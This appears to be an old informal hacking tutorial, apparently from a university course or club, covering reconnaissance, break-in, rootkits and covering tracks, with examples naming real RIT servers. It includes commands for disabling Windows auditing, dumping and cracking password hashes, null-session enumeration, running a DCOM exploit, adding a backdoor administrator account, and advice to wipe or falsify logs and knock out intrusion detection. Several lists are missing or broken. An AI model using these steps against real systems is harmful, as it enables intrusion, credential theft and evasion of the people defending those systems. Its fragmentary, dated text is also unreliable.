Hackery Hacking Hacking requires patience, knowledge, and the proper tools. Patience doesn't grow on trees. If you don't have it, you're not going to be doing anything useful. Knowledge is crucial when trying to break a system. Lastly, without the proper tools, you aren't going to be effective.

It pretty much goes like this:

  1. Reconnaissance (scanning, discovery, enumeration)
  2. Penetration (oh baby?)
  3. Cleanup
  4. Expand influence
Reconnaissance requires patience. Mapping network resources isn't fast. Passive mapping (sniffing, etc) is even slower. Social engineering takes effort and skill. Generally, gathering information is often the most time-consuming task (for your computer or yourself).

Penetration is the fun part, breaking into a machine or network. Now that you know what services are running where, and how the network is layed out, etc, you need to break in. Different attacks work against different services, and certainly there are going to be exploits available for the older network services.

The next step once you've broken in should be to install some sort of backdoor or other utility, probably called a root kit, to help ensure your connectivity and "ownership" of that machine. The next step, once you've secured a machine is to clean up any audit trails that machine may have of your break in attempts. Cover your tracks.

Now that your tracks are covered, you can probably move on to another machine if you get bored on your existing machine. Your infection of one machine may lead you to more easily compromise other machines. Reconnaissance Reconnaissance is a long word...

But more than that, it's the first set of activities you'll need to be doing when you want to exploit vulnerabilities. How, you might ask, are you supposed to do surveillance and discovery? Good thing you asked. There are a number of scanning and discovery tools available to you in both Windows and Unix.

This is always the first step on the road of mischief. You can't hack what you can't see, right? So you are going to need to find out what services and software is being run on whatever you're wanting to break. Textbooks on hacking will talk about buzzwords like enumeration, foot-printing, and scanning. Long-story-short, you need to discover what is available on the network for exploitation.

There are a number of ways to do all of the above, some methods are passive scans while others are active. Passive means you don't have to touch the machine. Active, obviously the opposite, means you need to poke something, making yourself visible. These methods may include: sniffing traffic, banner scanning, port scanning, service queries and other various probes. Foot-printing Understanding the targets complete technical setup (domain names, location of critical systems, VPN access points, third party connectivity, etc.)

Techniques:

Guessing passwords is a simple and inelegant approach but its highly effective especially with Windows users Vulnerability Recon

Beware the awesome power of... the Banner

Knowing what version of the service is being run will help immensely. Banner version probes will help? Knowing what service and version are running will help you in your mighty quest for exploits.

Lots of services have banners on connect, ssh and smtp are just a few: Whew! That was hard. Now I know filer2.rit.edu. This server also happens to be mail.rit.edu, thanks banner!. Now know what versions of the mail system are running (PMDF?) and what version of ssh is running on that server: ssh.com's ssh server, called "SSH Secure Shell."

Software version numbers aren't the only data you can glean from banners. Take filer2.rit.edu's telnet banner: Well someone certainly doesn't want me logging in via telnet, right? They were kind enough to show me that the telnet banner hasn't been updated in at least 4 years. How do I know that? Having done my research (Have you?) I know that ISC no longer exists at RIT. It is now called ITS. Furthermore, the area code for Rochester, NY was changed to 585 several years ago (4ish?). There's a pretty good chance that the telnet service hasn't been updated since then either. My next task would be to figure out what kind of system and version of telnet it is running, but I already know it's a Tru64 4.1 machine from past experience. I can probably guess that it's running a standard telnet daemon. Now all I need to do is look for exploits.

How about some more recon? It helps if you really know how to use the protocols you want to exploit if you don't have a tool to probe information for you. Let's ask RIT about it's primary webserver, shall we? Apache 1.3.9? PHP 3.x? This webserver hasn't been updated since 1999. Hopefully by now you understand what banner probing is. If not, then perhaps you should consider a more Liberal Arts-like major. Obviously, Google is a clear option for looking for what is probably exploitable. Other websites that can clue you into vulnerability information are:

Post-Reconnaissance So you've done your homework. You discovered machines and services, perhaps you also know the version of some services that are running. What next?

Using your knowledge of how the network is connected and what services are running, you need to find (or write) the tools that will help you exploit these services.

Understand what is exploitable requires an understanding of the services themselves. You need to consider the following:

If you don't have physical access to the machine, you obviously have only one route in, from the network. To get local access, a network service needs to be exploited. Most often this can be in the form of a buffer overflows, but other exploit methods are still likely. Networked Services In today's average multi-computer, multi-user environment, you can expect to find many networked services. A Windows environment might have such services as file and print sharing, shared authentication, Active Directory, remote desktop, VNC, and others. A Unix environment may have other services such as nfs, nis, ldap, ssh, etc. Any environment is just as likely to have mail and web services.

Many of these services will be vulnerable to simple MITM (Man In The Middle) attacks or other kinds of attacks such as remote resource starvation. MITM attacks are easily executed using prewritten tools and work for most standard unsecured services. However, without proper trust verification, many "secure" service protocols are also vulnerable to MITM attacks.

Simple network-based attacks include:

Think your precious SSL-protected services are free from script kiddies? With OpenSSL I can simply connect as if I were using telnet. (Unix) Tools It's getting to be that time where theory and such aren't going to be enough to help you. You need tools and the knowledge to employ them. For the moment, let's pretend we are in the scanning and enumeration phase of our shenanigans. Let's also pretend that we have a fairly basic install of a modern free Unix-like operating system, such as Linux, FreeBSD, or OpenBSD.

The most basic tools you will have at your disposal are going to be the following:

Believe it or not, with these basic tools, you can do almost all of the scanning and enumeration you will need to do. Certainly it doesn't hurt to have better, faster tools at your disposal, so you'll want to get your hands on: (Unix) Scanning

There are two things you want to do first when scanning: Both of these will give you plenty of information about what the network looks like. READ THE NMAP MAN PAGE, THANKS.

Well I certainly know what machines are alive on the small section of the network I scanned. You can do more in-depth scanning on individual hosts or on an entire subnet by doing a different kind of scan. Other typical scans are:

There are obviously other options and other scanning methods, but like I said: Read the manpage. If you have questions, ask. Scanning Notes Thinks you should keep in mind: (Unix) Enumeration Hopefully by now you know what ports are open and on what machines. Now you'll need to find out what versions of what software are running. Some folks decide that security through obscurity (Microsoft, anyone?) is the best strategy for security. Chances are you may find a service running on a nonstandard port.

Banner and protocol testing:

Some protocols may not have banners (http, ldap, etc) so you'll need to "guess" at the protocol if it doesn't present a banner. (Windows) Foundstone ScanLine Options:
-b - Get port banners -c - Timeout for TCP and UDP attempts (ms). Default is 4000 -d - Delay between scans (ms). Default is 0 -f - Read IPs from file. Use "stdin" for stdin -g - Bind to given local port -h - Hide results for systems with no open ports -i - For pinging use ICMP Timestamp Requests in addition to Echo Requests -j - Don't output "-----..." separator between IPs -l - Read TCP ports from file -L - Read UDP ports from file -m - Bind to given local interface IP -n - No port scanning - only pinging (unless you use -p) -o - Output file (overwrite) -O - Output file (append) -p - Do not ping hosts before scanning -q - Timeout for pings (ms). Default is 2000 -r - Resolve IP addresses to hostnames -s - Output in comma separated format (csv) -t - TCP port(s) to scan (a comma separated list of ports/ranges) -T - Use internal list of TCP ports -u - UDP port(s) to scan (a comma separated list of ports/ranges) -U - Use internal list of UDP ports -v - Verbose mode -z - Randomize IP and port scan order Example: sl -bht 80,100-200,443 10.0.0.1-200 (Windows) ScanLine Example sl -b -p -t 22 ScanLine (TM) 1.01 Copyright (c) Foundstone, Inc. 2002 http://www.foundstone.com Scan of 1 IP started at Tue Sep 20 22:58:39 2005 ----------------------------------------------------------- 129.21.##.## Responds with ICMP unreachable: No TCP ports: 22 TCP 22: [SSH-1.99-OpenSSH_3.7p1] ----------------------------------------------------------- Scan finished at Tue Sep 20 22:58:39 2005 1 IP and 1 port scanned in 0 hours 0 mins 0.02 secs ]]> (Windows) Enumeration Extracting information like user accounts and poorly protected resource shares

Useful Built-in Tools:

To show available domains
net view /domain
To show all computers on that domain:
net view /domain:<domainname>
Show system name, domain, logged-on users and running services:
nbtstat A <ipaddr>
 (Windows) Auditing Check Auditing Policies: auditpol \\ Running ... (X) Audit Enabled <- Auditing enabled, need to turn it off AuditCategorySystem = Success and Failure AuditCategoryLogon = Success and Failure AuditCategoryObjectAccess = Success and Failure AuditCategoryPrivilegeUse = Success and Failure AuditCategoryDetailedTracking = Success and Failure AuditCategoryPolicyChange = Success and Failure AuditCategoryAccountManagement = Success and Failure Unknown = Success and Failure Unknown = Success and Failure ]]> Turn off Auditing: auditpol \\ /disable Running ... Audit information changed successfully on \\ ... New audit policy on \\ ... (0) Audit Disabled AuditCategorySystem = Success and Failure AuditCategoryLogon = Success and Failure AuditCategoryObjectAccess = Success and Failure AuditCategoryPrivilegeUse = Success and Failure AuditCategoryDetailedTracking = Success and Failure AuditCategoryPolicyChange = Success and Failure AuditCategoryAccountManagement = Success and Failure Unknown = Success and Failure Unknown = Success and Failure ]]> (Windows) Password Hashes pwdump2 576 > hashes.txt Administrator:50aa0: Bob:10cwec03: Guest:50:aad3b4404ee HelpAssistant:1000: SUPPORT_38wwgw945a0:1002: C:\>john hashes.txt Loaded 2 passwords with no different salts (NT LM DES [24/32 4K]) (Bob:2) FOO (Bob:1) guesses: 2 time: 0:00:00:01 (3) c/s: 153442 trying: FAS - NSK ]]> (Windows) Searching the Filesystem find "password" *.txt ---------- PLEASE_DONT_README.TXT i save user's passwords in plain text files, yay! ]]> Or for more in-depth results, use findstr: Penetration *moan* Penetration is just what it sounds like. the "break in" process of hacking someone elses poor machines. Penetration can occur a number of ways, but the primary means are either through remote exploitation or local exploitation.

Things to exploit:

Break in remotely, secure your position on the machine locally, THEN worry about doing other nasty things. If you don't install a root kit or other tool to ensure your continued access to this machine via the network, it is very possible that the exploit you use on a machine is a one-time kind of attack that brings down the service. You may only get one shot. (Windows) Hacking Services

IIS

Using telnet or netcat, you may connect to the IIS server on port 80 and execute commands to perform buffer overflows or queries to get more information like the current version (HEAD / HTTP/1.0 [CRLF] [CRLF]).

SQL Server

Can be as simple as using the Query Analyzer and connecting to the remote SQL server and guessing the sa password. If guessing doesn't work, tools like SQLdict or sqlbf will perform brute force dictionary attacks on the sa account password. If thats too much work for you, a tool called sqlpoke will search for SQL servers that have a blank sa account password.

Also, SQL server passwords are not encrypted by default, just scrambled. A simple XOR scheme simply disguises the password. So, all you have to do is take a packet capture and then convert it over using this method:

2A (swap) -> binary -> XOR with binary of 5A -> convert back to hex and get the first letter of the password

]]> Finally, code injection is always a possibility with IIS (as it is with an database server).

Terminal Services

To locate a terminal server, scan machines for an open TCP 3389 port or do a Google search for the default TS Web Authentication page. Also, tools like TSProbe and TSEnum will search the subnet for terminal servers. An application TSGrinder (hammerofgod.com) will perform dictionary attacks against a terminal server and since a TS logon is the equivalent of an interactive logon, there is no lockout threshold for the Administrator account. (Windows) NetBIOS Null Sessions net use \\target\ipc$ /user: Originally, Microsoft allowed anyone who was un-authenticated access to the system to browse lists of users and other connected systems. It turns out this is a bad idea (surprised?)
Microsoft had placed null sessions into the everyone group giving them access to privileged information. Microsoft has now created the Authenticated Users group in Windows 2003 and later versions of Windows 2000. With this you could then get access to information about all of the groups, users, SMB shares, and even privilege information.
Once you have a machine scanned, look for ports 135, 137,138, and 139. If they are available then the machine may be vulnerable to Null Sessions.
(Windows) NetBIOS Null Session Tools (Windows) DCOM Exploits DCOM is the Distributed Component Object Model, and is a method that Microsoft uses to allow many of their software applications to communicate with each other and other Windows systems.

Downloaded Exploit at Security Forest via the ExploitTree. - Usage: ./dcom - Targets: - 0 Windows 2000 SP0 (english) - 1 Windows 2000 SP1 (english) - 2 Windows 2000 SP2 (english) - 3 Windows 2000 SP3 (english) - 4 Windows 2000 SP4 (english) - 5 Windows XP SP0 (english) - 6 Windows XP SP1 (english) ]]> - Using return address of 0x77f92a9b ]]> This will give you a Windows Systems Level Shell to play with. So what do we do from here? Time to copy over something nice and fun to give us access, but how? net user NewAdmin CoolPassword /add C:\> net localgroup Administrators NewAdmin /add ]]> Now browse the administrative share on the pc, \\Computer\\c$ and upload a file, then use your DCOM shell to run your uploaded programs. Metasploit Expanding your Influence Based on services running on systems, start tracking down other hosts this host may have access to. Employ any passwords that you have gained by cracking password hashes as likely guesses for accounts on other machines. If your mission is just to be a jack ass, start altering key files and tainting audit logs.

Examine your new pet machine and look for trust relationships with other hosts. Look for shared authentication, networked disk (nfs or samba), etc. You need to know about the system before you can use it to your advantage. Root Kits A root kit is a tool you use once a machine has been compromised to maintain your access to the system later. There are many root kits available for Windows systems that will do many different tasks. Some will simply give you a VNC connection to the system, while others will log keystrokes, web connections, and logins to other machines to extend your evil influence. Finally, Root kits will very carefully hide themselves in Windows so that uneducated (and some educated) people will not know they are there. Root kit automated cleanup attempts are almost always easily discovered (utmp gets blown away, for example) becuase root kit programmers are probably just lazy. There are many automated root-kit checking systems available for free and for dollars.

For more information:
  1. wikipedia's article on root kits
  2. http://www.rootkit.com/
  3. http://www.egocrew.de/download.html
 Tools You Should Have Here is a good list of tools that you might want to keep around on a CD for next week:
  1. Ethereal for Windows and Unix
  2. NMap for Windows and Unix
  1. enum
  2. DumpSec
  3. Windows 2000 Support Tools / Resource Kit
  4. Windows 2003 Support Tools / Resource Kit
 Clean Up! Clean up your tracks! Audit logs are a bitch. If you get root, or otherwise gain access to logs, do as much meaningful damage to them as you can. You have three options with logs: I'd recommend choosing the first or second option. Wiping logs is definately the easiest, but if you taint the logs it's possible the unexpecting sysadmin or forensics nerd will expect logs to be either gone or untouched. Feel free to insert your own clever log entries to confuse whoever has the pleasure of tracing your tracks. Tricks Operation: Kill IDS An Intrusion Detection System is your worst enemy when you're being naughty. Perhaps "worst" is too strong of a word, but who cares! An IDS will log your scanning, dns queries, etc, assuming it's configured properly. Snort, by default, will log most suspicious activities (zone transfers, etc).

What can we do? Luckily, there are ways to detect passive sniffers (IDS) on the network. Such programs as anti_sniff and sentinel allow you to probe for promiscuous (sniffing) nodes. There are whitepapers online about various methods by which to detect machines that are sniffing traffic, most involve tricking buggy drivers into responding when they shouldn't when in promiscuous mode.

Once you've discovered a sniffing device (Hopefully an IDS), you can try disabling it one of a few ways:

OpenSSL So IIS is running with SSL only (https, port 443). How do you figure out what version it's running? OpenSSL comes with a wonderful utility called... openssl. Any modern unix will be using openssl, so this tool should be available.

For example, let's talk to RIT's secure IMAP server (port 993): So mymail.rit.edu also happens to be svits20.main.ad.rit.edu. Running Exchange Server 2003, version whatever.

You can clearly see that despite the fact that it's a secure connection, I obviously still connect to it. The same is true for secure http (https, port 443): You get the idea. So any tool that lets me generate queries that will break, say, Apache 1.3.9 will still work becuase I can use openssl to connect to secure http and use them. Yay Unix. LiveCDs for Justice LiveCDs are happy little tools that you can stick into a machine and boot a utility-oriented OS install. Probably Linux + some tools. There are a number of security-related livecds available to you. A HUGE list of known livecd kits are available here:
http://www.frozentech.com/content/livecd.php
You can search for security-related LiveCDs on that site.

Knoppix STD seems to have a fair set of useful tools, you might start with that. Resources Security Alert Resources:

Unix tools: Rootkit Info: Promiscuous Node Detection Security LiveCDs: